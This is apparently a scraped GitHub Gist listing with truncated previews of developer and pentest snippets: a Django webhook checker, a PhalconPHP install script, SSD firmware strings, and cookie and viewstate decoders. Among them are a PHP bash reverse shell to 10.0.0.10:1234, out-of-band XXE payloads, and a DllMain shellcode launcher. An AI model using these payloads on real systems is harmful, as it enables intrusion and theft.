andrewgross
/ travis_webhook_checker.py
Last active
November 5, 2020 15:10
Django View to check travis CI webhook signatures. Requires Django, python-requests and pyOpenSSL packages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| from __future__ import unicode_literals | |
| import base64 | |
| import json | |
| import logging | |
| from urlparse import parse_qs | |
| import requests |
Tosyn
/ phalconphp_php7_ubuntu_16_04.sh
Last active
October 28, 2021 10:43
PhalconPhp with PHP7 Installation on Ubuntu 16.04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # PhalconPhp with PHP7 installation on ubuntu:16.04 | |
| sudo apt-get update | |
| sudo apt-get install -y php7.0-fpm \ | |
| php7.0-cli \ | |
| php7.0-curl \ | |
| php7.0-gd \ |
babldev
/ decode_flask_cookie.py
Last active
December 15, 2023 12:02
Decode a Flask Session cookie, given the cookie and secret key
Manouchehri
/ EXT0BB6Q.bin.r2.strings.txt
Created
October 27, 2015 17:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0x0 16 15 SAMSUNG_SSD_BIN | |
| 0x10 20 19 0.01STH00001OEM_GEN | |
| 0x2c 14 13 2013121819:43 | |
| 0x579 8 7 pG\vIHh | |
| 0x59b 16 15 pG\a pG\b pG\t pG | |
| 0x5ae 7 6 P \nJQh | |
| 0x689 5 4 pG@ | |
| 0x6b2 5 4 LF3H | |
| 0x6f8 5 4 "H80 | |
| 0x750 7 6 H\a\fI\f9 |
cutaway
/ extract_java_server_faces_viewstate.py
Last active
June 25, 2021 08:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Name: extract_java_server_faces_viewstate | |
| Purpose: Extract and parse the Java Server Faces viewstate | |
| Date: 20150620 | |
| Author: Don C. Weber (@cutaway) of InGuardians, Inc. | |
| Resources: | |
| http://wiki.apache.org/myfaces/Secure_Your_Application |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import base64 | |
| import json | |
| from Crypto.Cipher import AES | |
| from phpserialize import loads | |
| def decrypt(payload): | |
| data = json.loads(base64.b64decode(payload)) |
securitytube
/ DllMainThread.c
Created
November 1, 2014 11:10
Launch Shellcode as a Thread via DllMain rather than a new process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Dll Hijacking via Thread Creation | |
| // Author - Vivek Ramachandran | |
| // Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com | |
| // Free Infosec Videos -- http://SecurityTube.net | |
| #include <windows.h> | |
| #define SHELLCODELEN 2048 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import argparse | |
| def main(): | |
| parser = argparse.ArgumentParser(description="Runs the script") | |
| subparsers = parser.add_subparsers(help='Specify secondary options') | |
| secondary_parser = subparsers.add_parser('secondary', help='secondary options') |